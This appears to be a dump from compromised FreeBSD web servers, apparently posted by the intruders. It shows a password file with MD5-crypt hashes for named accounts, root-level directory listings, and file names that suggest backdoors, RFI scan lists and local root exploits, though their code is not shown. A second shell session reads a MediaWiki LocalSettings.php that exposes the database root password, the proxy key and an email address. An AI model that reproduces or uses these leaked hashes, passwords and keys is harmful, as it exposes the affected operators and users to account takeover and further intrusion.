nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
ltsvadmin:$1$2fVGuwaC$7B57fBkwiTg9W1S5VKD5u1:1001:1001::0:0:User
&:/home/ltsvadmin:/bin/sh
zipservers:$1$A.lwsVBx$CmzJM6Wt3RX6jOvByFKSv0:1002:0::0:0:User
&:/home/zipservers:/bin/sh
inaki:*:1003:1003::0:0:Inaki:/home/inaki:/usr/local/bin/bash
tremulous:*:1006:1006::0:0:User &:/home/tremulous:/usr/local/bin/bash
trem-maps:*:1008:1008::0:0:User &:/home/trem-maps:/bin/sh
ms-clanserver:$1$KkKxsoei$936d9IWKWrptqxTRqCcKw.:1009:1009::0:0:User
&:/home/ms-clanserver:/usr/local/bin/bash
mysql::88:88::0:0:MySQL Daemon:/nonexistent:/usr/local/bin/bash
httpd::1015:1015::0:0:User &:/home/httpd:/usr/local/bin/bash
mjestic::1017:1017::0:0:User &:/home/mjestic:/bin/sh
alma-server::1018:1018::0:0:alma-server:/home/alma-server:/usr/local/bin/bash
test-serv::1019:1019::0:0:test-serv:/home/test-serv:/usr/local/bin/bash
negroe:$1$GJKcFbkI$eMgx8tGbbuAsIY7z4jrqT/:1020:1020::0:0:User
&:/home/negroe:/usr/local/bin/bash
helldive::1021:1021::0:0:helldive:/home/helldive:/usr/local/bin/bash
relentless:$1$hzrBuTFU$LxjyfrPLRNO5orBe/pw8V.:1022:1022::0:0:User
&:/home/relentless:/usr/local/bin/bash
nt-server:$1$bAEJNi4W$JCRyivGro8EsX/yMCouDS/:1023:1023::0:0:User
&:/home/nt-server:/usr/local/bin/bash
syense:$1$tHx1g5xm$HDClXkM2jE1bosbJDjG.V/:1024:1024::0:0:User
&:/home/syense:/usr/local/bin/bash
trem12:$1$x1CIdzvF$LSaYQRI5aZU0gPSTfOggw0:1025:1025::0:0:User
&:/home/trem12:/usr/local/bin/bash
ian:$1$KW5wFPNM$J1xzBja4bP/6qAtHHBKm//:1026:1026::0:0:User
&:/home/ian:/usr/local/bin/bash
kate:$1$.pMZPvPH$KKvicI7gzVfOMRWmtVfck0:1027:1027::0:0:Kate
Stone:/home/kate:/usr/local/bin/bash
untitledhosting:$1$R8QaOXJ.$zjw6dJXsIiVJlsWfYYKWk.:1028:1028::0:0:User
&:/home/untitledhosting:/usr/local/bin/bash
inkyslair:$1$UFYE2CK0$WrlYr6wPe32qU1j.xwLiz0:1029:1029::0:0:User
&:/home/inkyslair:/usr/local/bin/bash

>> ls -la /root
total 38474
drwx------  19 root	   wheel      2048 Mar 12 21:59 .
drwxr-xr-x  18 root	   wheel       512 Jan 26 19:57 ..
-rwx------   1 root	   wheel      3015 Feb 18 01:18 .bash_h1story
-rwx------   1 root	   wheel      9711 Mar 22 21:17 .bash_history
-rwx------   1 root	   wheel	30 Dec 15 17:10 .bash_profile
-rwx------   1 root	   wheel	30 Dec 15 17:03 .bashrc
drwx------   4 root	   wheel       512 Jan	5 10:07 .cpan
-rwx------   2 root	   wheel       801 Jan 12  2007 .cshrc
drwx------   2 root	   wheel       512 Mar 11 01:01 .elinks
-rwx------   1 root	   wheel       892 Dec 16 11:47 .history
drwx------   2 root	   wheel       512 Dec 15 16:14 .irssi
-rwx------   1 root	   wheel       143 Jan 12  2007 .k5login
-rw-------   1 root	   wheel	35 Mar 12 22:10 .lesshst
drwx------   2 root	   wheel       512 Mar 11 01:01 .links
-rwx------   1 root	   wheel       293 Jan 12  2007 .login
-rwx------   1 root	   wheel      1081 Feb 25 06:52 .mysql_history
-rwx------   1 root	   wheel     17401 Mar 12 21:59 .pinerc
-rwx------   2 root	   wheel       251 Jan 27 21:36 .profile
-rw-------   1 root	   wheel      1024 Feb 25 06:33 .rnd
drwx------   2 root	   wheel       512 Jan 29 22:58 .ssh
drwx------   3 root	   wheel       512 Jan	4 07:59 .subversion
-rwx------   1 root	   wheel	 0 Feb 18 01:18 .temp
drwx------   3 root	   wheel       512 Dec 16 02:48 .tremulous
drwx------   5 root	   wheel       512 Dec 18 22:15 .weechat
drwx------   2 root	   wheel       512 Dec 29 08:57 72.20.14.247
-rwx------   1 root	   wheel   1764184 Dec 19 01:55 Railroad.zip
-rwx------   1 root	   wheel    205609 Dec 17 15:39 acidtechpurple.zip
-rwx------   1 root	   wheel	 6 Feb 16 19:36 auth.log
-rwx------   1 root	   wheel       588 Dec 16 02:41 base-config.cfg
-rwx------   1 root	   wheel       223 Dec 16 02:40 base-confs.cfg
-rwx------   1 root	   wheel      4199 Feb 18 01:16 bd.pl
-rwx------   1 root	   wheel	 0 Feb 17 14:55 bot.pl
drwx------   3 root	   wheel       512 Feb	4 03:08 brute
-rwx------   1 root	   wheel	65 Feb 19 02:15 db.opt
-rwx------   1 root	   wheel      1827 Dec 16 03:05 install-trem-server.pl
drwx------   2 root	   wheel      6144 Feb 19 02:15 lt3c_phpbb
drwx------   2 root	   wheel       512 Jan 23 15:01 mail
drwx------   5 root	   wheel       512 Dec 24 01:18 master
-rwx------   1 root	   wheel     45778 Dec 24 02:56 master.tgz
-rwx------   1 root	   wheel   4367618 Jan 27 09:16 mbox
drwx------  14 root	   wheel       512 Jan	6 07:20 mumble
-rwx------   1 root	   wheel    631037 Feb	5 00:52 myspace.jpg
-rwx------   1 root	   wheel	46 Feb 19 02:13 mysql_fix.txt
-rwx------   1 root	   wheel     10704 Dec 16 21:05 nmap.log
-rwx------   1 root	   wheel	 0 Jan 27 00:09 sshd_log
-rwx------   1 root	   wheel	92 Dec 16 03:04 start.sh
-rwx------   1 root	   wheel     29529 Dec 23 21:59 sys.pl
-rwx------   1 root	   wheel  30932992 Feb	3 08:57 test100.zip
drwx------   7 root	   wheel       512 Feb 24 00:05 trunk
-rwx------   1 root	   wheel   1155345 Feb 18 02:08
ts2_server_rc2_202319.tar.bz2
drwx------   7 zipservers  100	       512 Feb 18 22:15 tss2_rc2
drwx------   4 root	   wheel       512 Dec 15 17:53 utils
>> ls -la /usr/home
total 56
drwxr-xr-x  25 1013		1013		  512 Mar 10 23:08 .
drwxr-xr-x  20 root		wheel		  512 Mar 11 23:49 ..
drwxr-xr-x   6 alma-server	alma-server	  512 Jan 21 07:40 alma-server
drwxr-xr-x   3 1013		1013		  512 Jan 27 09:22 aox
drwxr-xr-x   4 helldive 	helldive	  512 Feb  4 00:21 helldive
drwxr-xr-x   2 httpd		httpd		  512 Jan  4 05:14 httpd
drwxr-xr-x   5 ian		ian		  512 Mar 20 17:47 ian
drwx------  25 inaki		inaki		 1536 Mar 17 21:06 inaki
drwxr-xr-x   2 inkyslair	inkyslair	  512 Mar 15 22:16 inkyslair
drwxr-xr-x   3 1010		ircd		  512 Dec 16 20:25 ircd
drwxr-xr-x   4 kate		kate		  512 Feb 28 06:22 kate
drwxr-xr-x   2 1013		1013		  512 Dec 14 17:42 ltsvadmin
drwxr-xr-x   5 mjestic		mjestic 	  512 Jan 14 06:44 mjestic
drwxr-xr-x   4 ms-clanserver	ms-clanserver	  512 Dec 17 04:12
ms-clanserver
drwxr-xr-x   4 negroe		negroe		  512 Feb  9 10:21 negroe
drwxr-xr-x   9 nt-server	nt-server	  512 Mar  9 01:36 nt-server
drwxr-xr-x   3 1013		1013		  512 Dec 16 02:28 powerover
drwxr-xr-x   2 relentless	relentless	  512 Feb  7 16:55 relentless
drwxr-xr-x   6 syense		syense		  512 Mar 17 07:51 syense
drwxr-xr-x   4 test-serv	test-serv	  512 Jan 21 08:01 test-serv
drwxr-xr-x   5 trem-maps	trem-maps	 6656 Feb 26 03:57 trem-maps
drwxr-xr-x   4 trem12		trem12		  512 Feb 18 22:53 trem12
drwxr-xr-x   5 tremulous	tremulous	  512 Mar 21 20:09 tremulous
drwxr-xr-x   2 untitledhosting	untitledhosting   512 Mar  7 15:18
untitledhosting
drwxr-xr-x   2 1013		1013		  512 Feb 23 07:23 zipservers
>> ls -la invalid.site/www/
total 3718   
drwxrwxrwx   3 root   wheel	 512 Mar 11 04:15 .
drwxr-xr-x   4 root   wheel	 512 Feb  6 07:03 ..
-rwxr-xr-x   1 root   wheel   551940 Mar  1 04:58 __spl
drwxr-xr-x  11 root   wheel	2560 Mar 10 03:49 __sql
-rwxr-xr-x   1 root   wheel    13534 Mar  5 06:47 a.out  
-rw-r--r--   1 root   wheel	2412 Feb 15 07:40 attack.php
-rw-r--r--   1 root   wheel	2412 Feb 15 07:40 attack.src
-rwxr-xr-x   1 root   wheel	4175 Mar  8 02:18 bd.txt
-rwxr-xr-x   1 root   wheel	4168 Mar  8 02:24 bd_2.txt
-rwxrwxrwx   1 root   wheel	4606 Feb 29 06:10 bopm.conf
-rw-r--r--   1 root   wheel	5784 Mar  3 13:54 cute.php
-rw-r--r--   1 root   wheel	 706 Mar  9 06:23 dc.txt
-rw-r--r--   1 root   wheel	5185 Mar  1 05:55 exp.pm
-rw-r--r--   1 root   wheel    10486 Mar  1 06:10 get.txt
-rw-r--r--   1 root   wheel    10423 Mar  1 06:00 get.txty
-rw-r--r--   1 root   wheel	  20 Mar  1 03:18 index.php
-rw-r--r--   1 root   wheel	 341 Mar  7 02:22 inf.txt
-rwxr-xr-x   1 root   wheel    13534 Mar  1 06:54 kmod
-rw-r--r--   1 root   wheel	3740 Mar 15 13:56 kmod.c
-rwxr-xr-x   1 root   wheel	9014 Mar  5 06:47 krad
-rw-r--r--   1 root   wheel	 232 Feb 14 03:11 owned.php
-rwxr-xr-x   1 root   wheel	8574 Mar  1 06:17 perl_root
-rw-------   1 httpd  wheel  3072000 Mar  9 05:21 php-cgi.core
-rw-r--r--   1 root   wheel	3457 Feb 29 06:33 repl.txt
[root@athena:/var/www]

>> ls -la lt3c.info/www/
total 712
drwxr-xr-x   7 httpd  httpd	512 Feb 16 19:37 .
drwxr-xr-x   4 httpd  httpd	512 Jan 26 09:24 ..
-rw-r--r--   1 root   httpd  205609 Dec 17 15:39 acidtechpurple.zip
drwxr-xr-x   2 httpd  httpd	512 Jan 31 02:23 css
drwxr-xr-x  13 httpd  httpd    1024 Feb  9 02:40 forum
drwxr-xr-x   2 httpd  httpd	512 Jan 31 05:34 images
-rw-r--r--   1 httpd  httpd    3094 Mar  8 01:44 index.php
drwxr-xr-x   2 httpd  httpd	512 Mar 17 20:50 inky
-rw-r--r--   1 httpd  httpd	267 Mar  8 01:44 lib.php
drwxr-xr-x   2 httpd  httpd	512 Jan 31 07:01 pages
-rw-r--r--   1 httpd  httpd	904 Mar  8 01:44 temp.htm
-rw-r--r--   1 root   httpd	 45 Feb 12 08:27 uta.htm
-rw-r--r--   1 root   httpd  214602 Feb 12 08:13 uta.pmd
-rw-r--r--   1 root   httpd  211734 Feb 12 08:24 uta.qcp
[root@athena:/var/www]
>> ls -la partyvanradio.org/www/
total 6
drwxr-xr-x  2 relentless  relentless  512 Feb  7 06:54 .
drwxr-xr-x  4 root	  wheel       512 Feb  7 06:53 ..
-rw-r--r--  1 relentless  relentless  166 Feb  7 07:13 index.php
[root@athena:/var/www]
>> ls -la untitledhosting.org/www/
total 74
drwxr-xr-x  10 untitledhosting	untitledhosting   512 Mar 10 03:05 .
drwxr-xr-x   4 root		wheel		  512 Mar  7 15:13 ..
-rw-r--r--   1 untitledhosting	untitledhosting     8 Mar 10 03:05 LAWL
drwxr-xr-x   4 untitledhosting	untitledhosting  2048 Mar 10 02:47 admin
-rwxr-xr-x   1 untitledhosting	untitledhosting  5805 Mar 10 02:52 config.php
drwxr-xr-x   2 untitledhosting	untitledhosting   512 Mar 10 02:47 doc
-rw-r--r--   1 untitledhosting	untitledhosting   318 Jan  3 02:56
favicon_cms.ico
-rw-r--r--   1 untitledhosting	untitledhosting   330 Jan  3 02:56 fileloc.php
drwxr-xr-x   3 untitledhosting	untitledhosting   512 Mar 10 02:47 images
-rw-r--r--   1 untitledhosting	untitledhosting  8187 Jan  3 02:56 include.php
-rw-r--r--   1 untitledhosting	untitledhosting  9809 Jan  3 02:56 index.php
drwxr-xr-x  11 untitledhosting	untitledhosting   512 Mar 10 02:47 lib
-rw-r--r--   1 untitledhosting	untitledhosting   961 Jan  3 02:56 moduleinterface.php
drwxrwxrwx  12 untitledhosting	untitledhosting   512 Mar 10 02:47 modules
drwxr-xr-x   3 untitledhosting	untitledhosting  2048 Mar 10 02:47 plugins
-rw-r--r--   1 untitledhosting	untitledhosting  1955 Jan  3 02:56 preview.php
-rw-r--r--   1 untitledhosting	untitledhosting   168 Jan  3 02:56 robots.txt
-rw-r--r--   1 untitledhosting	untitledhosting  4161 Jan  3 02:56 soap.php
-rw-r--r--   1 untitledhosting	untitledhosting  2535 Jan  3 02:56 stylesheet.css
-rw-r--r--   1 untitledhosting	untitledhosting  5179 Jan  3 02:56 stylesheet.php
drwxrwxrwx   6 untitledhosting	untitledhosting   512 Mar 10 02:47 tmp
drwxrwxrwx   4 untitledhosting	untitledhosting   512 Mar 10 03:09 uploads
-rw-r--r--   1 untitledhosting	untitledhosting  1127 Jan  3 02:56 version.php
[root@athena:/var/www]
>> ls -la /home/inaki/
total 157184
drwx------  25 inaki  inaki	  1536 Mar 17 21:06 .
drwxr-xr-x  25 1013   1013	   512 Mar 10 23:08 ..
-rwx------   1 inaki  inaki	 10462 Mar 22 00:28 .bash_history
-rwx------   1 inaki  inaki	    30 Dec 16 17:56 .bash_profile
-rwx------   1 inaki  inaki	    30 Dec 16 17:56 .bashrc
-rw-r--r--   1 inaki  inaki	 14178 Mar  4 00:00 .bot_log
-rwx------   1 inaki  inaki	   767 Dec 15 16:07 .cshrc
-rw-r--r--   1 inaki  inaki	     6 Mar 17 21:06 .gay-state
-rwx------   1 inaki  inaki	   142 Dec 17 01:58 .history
drwx------   2 inaki  inaki	   512 Dec 18 22:12 .irssi
-rw-------   1 inaki  inaki	    35 Mar  9 18:42 .lesshst
drwx------   2 inaki  inaki	   512 Jan 30 21:51 .links
-rwx------   1 inaki  inaki	   248 Dec 15 16:07 .login
-rwx------   1 inaki  inaki	   158 Dec 15 16:07 .login_conf
-rwx------   1 inaki  inaki	   373 Dec 15 16:07 .mail_aliases
-rwx------   1 inaki  inaki	   331 Dec 15 16:07 .mailrc
-rwx------   1 inaki  inaki	   797 Dec 15 16:07 .profile
-rwx------   1 inaki  inaki	   276 Dec 15 16:07 .rhosts
-rwx------   1 inaki  inaki	   975 Dec 15 16:07 .shrc
drwx------   2 inaki  inaki	   512 Feb  9 07:09 .ssh
drwx------   7 inaki  inaki	   512 Mar 17 16:56 .weechat
-rw-r--r--   1 inaki  inaki	  1330 Mar 10 03:53 InstallMorgan.pl
drwxr-xr-x   2 inaki  inaki	   512 Mar  5 22:56 RFIscan
drwx------  17 inaki  inaki	  1536 Mar 12 21:55 Unreal3.2.7
-rwx------   1 inaki  inaki    2801622 Dec 29 09:01 Unreal3.2.7.tar.gz
-rw-r--r--   1 inaki  inaki	 12469 Mar  7 05:27 _good_rfis.txt
drwx------   7 inaki  inaki	  1024 Dec 27 22:44 anope-1.7.19
-rwx------   1 inaki  inaki    1505639 Jun 10  2007 anope-1.7.19.tar.gz
drwx------   8 inaki  inaki	   512 Jan 13 07:25 bopm
drwx------   5 inaki  inaki	  1024 Jan 13 07:02 bopm-3.1.3
-rwx------   1 inaki  inaki	819273 May 16  2007 bopm-3.1.3.tar.gz
-rwx------   1 inaki  inaki	  1424 Dec 27 21:59 bot.pl
-rwx------   1 inaki  inaki	  1401 Dec 25 08:31 bot.pl.save
-rwx------   1 inaki  inaki	  1417 Dec 27 21:57 bot.pl/
drwx------   4 inaki  inaki	   512 Mar  3 14:10 botpanel
-rwx------   1 inaki  inaki	 11962 Feb 13 03:05 botpanel.tgz
-rwx------   1 inaki  inaki	     0 Dec 23 00:06 cigarette
-rw-r--r--   1 inaki  inaki	  1334 Mar  8 05:57 cleanrfi.pl
drwxrwxrwx   3 inaki  inaki	   512 Feb 23 04:17 exe
drwx------   2 inaki  inaki	   512 Feb  9 07:43 flash
-rwx------   1 inaki  inaki	130677 Jul 14  2007 gay
-rwx------   1 inaki  inaki	  2576 Nov 24 23:25 gen.pl
-rwxr-xr-x   1 inaki  inaki	   655 Mar  5 02:45 getRFI.sh
-rw-r--r--   1 inaki  inaki	121721 Mar 10 04:33 good_rfis.txt
drwxrwxrwx   2 inaki  inaki	   512 Feb 21 04:08 images
drwx------   8 inaki  inaki	   512 Jan  5 09:48 ircd
-rwx------   1 inaki  inaki    2457953 Dec 19 02:58 irssi
-rwx------   1 inaki  inaki	   530 Dec 19 01:34 jap.pl
drwx------   5 inaki  inaki	   512 Feb 17 15:56 jewgong
-rwx------   1 inaki  inaki	  1507 Jan  5 08:37 lol.sh
-rwx------   1 inaki  inaki	  5026 Feb  1 23:08 lolol
drwx------   4 inaki  inaki	   512 Jan  4 22:25 lulzhost.net
-rwx------   1 inaki  inaki	 45778 Dec 24 02:22 master.tgz
drwx------   7 inaki  inaki	   512 Dec 27 22:50 misc
-rwx------   1 inaki  inaki	  1993 Dec  1 19:39 mpdnp.pl
drwx------   2 inaki  inaki	   512 Feb 17 11:04 music
-rwx------   1 inaki  inaki    9576448 Feb  3 09:29 openssl_installer.exe
-rwx------   1 inaki  inaki	     0 Feb 11 03:27 out
drwx------   2 inaki  inaki	   512 Jan 11 20:20 oxygen
-rwx------   1 inaki  inaki	     0 Nov 25 09:04 pizza
drwx------   2 inaki  inaki	   512 Jan 16 23:14 public_html
drwx------   2 inaki  inaki	   512 Jan  4 03:33 radiobot
-rwx------   1 inaki  inaki	   806 Dec 16 21:17 range
-rw-r--r--   1 inaki  inaki	190367 Mar 21 21:52 rfis.txt
drwx------   3 inaki  inaki	  1024 Jan 14 00:38 seeborg-0.51
-rwx------   1 inaki  inaki	 58113 Aug 15  2003 seeborg-0.51.tar.gz
-rwx------   1 inaki  inaki	   825 Dec  1 17:59 server.cfg
-rwx------   1 inaki  inaki   14285284 Dec 25 03:00 sy.rar
-rwx------   1 inaki  inaki	    55 Dec  8 10:30 test
-rwx------   1 inaki  inaki	    67 Dec  7 12:48 test.sh
drwx------   3 inaki  inaki	   512 Jan  5 09:48 testircd
-rwx------   1 inaki  inaki	     0 Nov 24 22:00 trace.rt
-rwx------   1 inaki  inaki  128561152 Mar  8 00:19 weechat-curses.core
-rwx------   1 inaki  inaki	    69 Dec 16 21:17 xh.pl
>> ls -la /usr/home/mjestic/
total 204
drwxr-xr-x   5 mjestic	mjestic     512 Jan 14 06:44 .
drwxr-xr-x  25 1013	1013	    512 Mar 10 23:08 ..
-rw-------   1 mjestic	mjestic    1404 Jan 14 06:52 .bash_history
-rw-r--r--   1 mjestic	mjestic     767 Jan 14 05:18 .cshrc
-rw-r--r--   1 mjestic	mjestic     248 Jan 14 05:18 .login
-rw-r--r--   1 mjestic	mjestic     158 Jan 14 05:18 .login_conf
-rw-------   1 mjestic	mjestic     373 Jan 14 05:18 .mail_aliases
-rw-r--r--   1 mjestic	mjestic     331 Jan 14 05:18 .mailrc
-rw-r--r--   1 mjestic	mjestic     797 Jan 14 05:18 .profile
-rw-------   1 mjestic	mjestic     276 Jan 14 05:18 .rhosts
-rw-r--r--   1 mjestic	mjestic     975 Jan 14 05:18 .shrc
drwxr-xr-x   4 mjestic	mjestic     512 Jan 14 06:45 .tremulous
drwxr-xr-x   5 mjestic	mjestic     512 Nov  8 07:29 arcade
-rw-r--r--   1 mjestic	mjestic  178453 Nov  8 07:30 arcade-svn971-14-vm.tar.gz
drwxr-xr-x   3 mjestic	mjestic     512 Jan 14 06:46 trem-server
[root@athena:/var/www]

/*
*
* And now for partyvan.info
*
*/ 

$ uname -a
FreeBSD partyvan.info 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52
UTC 2008     root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
$ w
12:22AM  up  2:37, 0 users, load averages: 0.06, 0.06, 0.07
USER		 TTY	  FROM		    LOGIN@  IDLE WHAT
$ ls
apache22
squirrelmail
$ pwd
/usr/local/www
$ cd apache22
$ ls -al
total 14
drwxr-xr-x   6 root  wheel   512 Mar  8 16:40 .
drwxr-xr-x   4 root  wheel   512 Mar  8 22:03 ..
drwxr-xr-x   2 root  wheel   512 Mar  8 16:40 cgi-bin
drwxr-xr-x  28 root  wheel  1536 Mar  8 22:01 data
drwxr-xr-x   3 root  wheel  1024 Mar  8 16:40 error
drwxr-xr-x   3 root  wheel  3584 Mar  8 16:40 icons
$ cd data
$ ls -al
total 120006
drwxr-xr-x  28 root	wheel	      1536 Mar	8 22:01 .
drwxr-xr-x   6 root	wheel	       512 Mar	8 16:40 ..
drwxr-xr-x   3 root	picatta        512 Mar	8 17:41 711chan
-rwxr-xr-x   1 root	picatta        825 Mar	5 12:48 AdminSettings.sample
-rwxr-xr-x   1 root	picatta      17997 Mar	5 12:48 COPYING
-rwxr-xr-x   1 root	picatta        162 Mar	5 12:48 FAQ
-rwxr-xr-x   1 root	picatta     175294 Mar	5 12:48 HISTORY
-rwxr-xr-x   1 root	picatta       3992 Mar	5 12:48 INSTALL
-rw-r--r--   1 root	picatta       4522 Mar	5 12:48 LocalSettings.php
-rwxr-xr-x   1 root	picatta 	27 Mar	5 12:48 Makefile
-rwxr-xr-x   1 root	picatta      44283 Mar	5 12:48 RELEASE-NOTES
-rwxr-xr-x   1 root	picatta        605 Mar	5 12:48 StartProfiler.php
-rwxr-xr-x   1 root	picatta      12816 Mar	5 12:48 UPGRADE
-rwxr-xr-x   1 root	picatta       1316 Mar	5 12:48 api.php
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 auth
drwxr-xr-x   3 root	wheel	       512 Mar	8 17:41 backup
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 bin
drwxr-xr-x  18 root	picatta        512 Mar	8 17:41 cachedir
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 cgi-bin
-rw-r--r--   1 root	picatta       1832 Mar	5 12:48 cheese.gif
-rw-r--r--   1 root	picatta       1677 Mar	5 12:48 cheese2.gif
-rwxr-xr-x   1 root	picatta  122077184 Mar	5 12:48 core.21271
drwxr-xr-x   3 root	picatta        512 Mar	8 17:41 dev
drwxr-xr-x   4 root	picatta        512 Mar	8 17:41 docs
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 donate
-rw-r--r--   1 root	picatta       2037 Mar	5 12:48 epiccheese.js
-rw-r--r--   1 root	picatta       2091 Mar	5 12:48 epicfail.js
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 extensions
-rwxr-xr-x   1 root	picatta       1150 Mar	5 12:48 favicon.ico
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 fimg
-rwxr-xr-x   1 root	picatta       1501 Mar	5 12:48 front.php
-rwxr-xr-x   1 root	picatta        173 Mar	5 12:48 google.html
drwxr-xr-x   3 root	picatta        512 Mar	8 17:41 hosted
drwxr-xr-x  21 root	picatta        512 Mar	8 17:41 images
-rwxr-xr-x   1 root	picatta       1978 Mar	5 12:48 img_auth.php
drwxr-xr-x   7 root	picatta       5632 Mar	8 17:41 includes
-rwxr-xr-x   1 root	picatta        113 Mar	5 12:48 index.dongs
-rwxr-xr-x   1 root	picatta       1513 Mar	5 12:48 index.old
-rwxr-xr-x   1 root	picatta       8716 Mar	5 12:48 index.php
-rwxr-xr-x   1 root	picatta        454 Mar	5 12:48 index.php__
-rwxr-xr-x   1 root	picatta 	21 Mar	5 12:48 info.php
-rwxr-xr-x   1 root	picatta       3899 Mar	5 12:48 install-utils.inc
drwxr-xr-x   4 root	picatta        512 Mar	8 17:41 languages
-rwxr-xr-x   1 root	picatta        584 Mar	5 12:48 load.php
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 locale
-rwxr-xr-x   1 root	picatta       3227 Mar	5 12:48 lol.css
drwxr-xr-x   9 root	picatta       4096 Mar	8 17:41 maintenance
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 math
-rw-r--r--   1 root	picatta 	 0 Mar	5 12:48 merge.php
-rwxr-xr-x   1 root	picatta      19631 Mar	5 12:48 mudkipz.png
-rwxr-xr-x   1 root	picatta       1532 Mar	5 12:48 opensearch_desc.php
-rwxr-xr-x   1 root	picatta      65394 Mar	5 12:48 owned1.jpg
-rwxr-xr-x   1 root	picatta      67133 Mar	5 12:48 owned2.jpg
-rw-r--r--   1 picatta	picatta        361 Mar	8 21:56 portl.html
-rwxr-xr-x   1 root	picatta       6173 Mar	5 12:48 profileinfo.php
drwxr-xr-x   3 root	picatta        512 Mar	8 17:41 public_ftp
drwxr-xr-x   7 root	picatta       1024 Mar	8 17:41 raid
-rwxr-xr-x   1 root	picatta        428 Mar	5 12:48 redir.php
-rwxr-xr-x   1 root	picatta        319 Mar	5 12:48 redirect.php
-rwxr-xr-x   1 root	picatta 	91 Mar	5 12:48 redirect.phtml
-rwxr-xr-x   1 root	picatta 	92 Mar	5 12:48 robots.txt
-rwxr-xr-x   1 root	picatta       1351 Mar	5 12:48 seal.php
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 serialized
-rwxr-xr-x   1 root	picatta     147770 Mar	5 12:48 shit.jpg
drwxr-xr-x  10 root	picatta       1024 Mar	8 17:41 skins
drwxr-xr-x   3 root	picatta        512 Mar	8 17:41 t
-rwxr-xr-x   1 root	picatta 	 6 Mar	5 12:48 test
-rwxr-xr-x   1 root	picatta 	27 Mar	5 12:48 test.php
-rwxr-xr-x   1 root	picatta 	53 Mar	5 12:48 test2.php
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 tests
-rwxr-xr-x   1 root	picatta       2408 Mar	5 12:48 thumb.php
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 tmp
-rwxr-xr-x   1 root	picatta       1384 Mar	5 12:48 trackback.php
drwxr-xr-x   2 root	picatta        512 Mar	8 17:41 vamp
-rwxr-xr-x   1 root	picatta 	88 Mar	5 12:48 wiki.phtml
-rwxr-xr-x   1 root	picatta       1756 Mar	5 12:48 ~index.php
$ cat LocalSettings.php
<?php

# This file was automatically generated by the MediaWiki installer.
# If you make manual changes, please keep track in case you need to
# recreate them later.
#
# See includes/DefaultSettings.php for all configurable settings
# and their default values, but don't forget to make changes in _this_
# file, not there.

# If you customize your file layout, set $IP to the directory that contains
# the other MediaWiki files. It will be used as a base to locate files.
if( defined( 'MW_INSTALL_PATH' ) ) {
	$IP = MW_INSTALL_PATH;
} else {
	$IP = dirname( __FILE__ );
}

$path = array( $IP, "$IP/includes", "$IP/languages" );
set_include_path( implode( PATH_SEPARATOR, $path ) . PATH_SEPARATOR .
get_include_path() );
require_once( "includes/DefaultSettings.php" );

# If PHP's memory limit is very low, some operations may fail.
# ini_set( 'memory_limit', '20M' );

if ( $wgCommandLineMode ) {
	if ( isset( $_SERVER ) && array_key_exists( 'REQUEST_METHOD', $_SERVER
) ) {
		die( "This script must be run from the command line/n" );
	}
} elseif ( empty( $wgNoOutputBuffer ) ) {
	## Compress output if the browser supports it
	if( !ini_get( 'zlib.output_compression' ) ) @ob_start( 'ob_gzhandler'
);
}

$wgSitename	    = "Insurgency Wiki";

## The URL base path to the directory containing the wiki;
## defaults for all runtime URL paths are based off of this.
$wgScriptPath	    = "";

## For more information on customizing the URLs please see:
## http://www.mediawiki.org/wiki/Manual:Short_URL

$wgShowIPinHeader = false;
$wgEnableEmail	    = true;
$wgEnableUserEmail  = true;

$wgEmergencyContact = "Coprolal1an@gmail.com";
$wgPasswordSender = "Coprolal1an@gmail.com";

## For a detailed description of the following switches see
## http://meta.wikimedia.org/Enotif and http://meta.wikimedia.org/Eauthent
## There are many more options for fine tuning available see
## /includes/DefaultSettings.php
## UPO means: this is also a user preference option
$wgEnotifUserTalk = true; # UPO
$wgEnotifWatchlist = true; # UPO
$wgEmailAuthentication = true;

$wgDBtype	    = "mysql";
$wgDBserver	    = "localhost";
$wgDBname	    = "partyvan_insurgency";
$wgDBuser	    = "root";
$wgDBpassword	    = "lolcats8295";

$wgDBport	    = "3306";
$wgDBprefix	    = "mw_";

# Schemas for Postgres
$wgDBmwschema	    = "mediawiki";
$wgDBts2schema	    = "public";

# Experimental charset support for MySQL 4.1/5.0.
$wgDBmysql5 = false;

## Shared memory settings
$wgFileCacheDirectory = '/home/partyvan/public_html/cachedir/';
$wgShowIPinHeader = false;
$wgUseFileCache = true;
$wgMainCacheType = CACHE_MEMCACHED;
$wgDisableCounters=true;
$wgMemCachedServers = array();
$wgUseMemCached = true;
$wgMemCachedServers = array( "127.0.0.1:11211" );
## To enable image uploads, make sure the 'images' directory
## is writable, then set this to true:
$wgEnableUploads       = true;
$wgUseImageResize      = true;
$wgUseImageMagick = true;
$wgImageMagickConvertCommand = "/usr/bin/convert";

## If you want to use image uploads under safe mode,
## create the directories images/archive, images/thumb and
## images/temp, and make them all writable. Then uncomment
## this, if it's not already uncommented:
# $wgHashedUploadDirectory = false;

## If you have the appropriate support software installed
## you can enable inline LaTeX equations:
$wgUseTeX	    = false;

$wgLocalInterwiki   = $wgSitename;
$wgLanguageCode = "en";

$wgProxyKey =
"79057c7a1562bb0417a20556cf0a63001ebacb27da55d05511820902bab34586";

## Default skin: you can change the default skin. Use the internal symbolic
## names, ie 'standard', 'nostalgia', 'cologneblue', 'monobook':
$wgDefaultSkin = 'nostalgia';

## For attaching licensing metadata to pages, and displaying an
## appropriate copyright notice / icon. GNU Free Documentation
## License and Creative Commons licenses are supported so far.
$wgEnableCreativeCommonsRdf = true;
$wgRightsPage = ""; # Set to the title of a wiki page that describes your
license/copyright
$wgRightsUrl = "http://creativecommons.org/licenses/by-nc-sa/3.0/";
$wgRightsText = "Attribution-Noncommercial-Share Alike 3.0 ";
$wgRightsIcon = "http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png";
# $wgRightsCode = "by-nc-sa"; # Not yet used

$wgDiff3 = "/usr/bin/diff3";

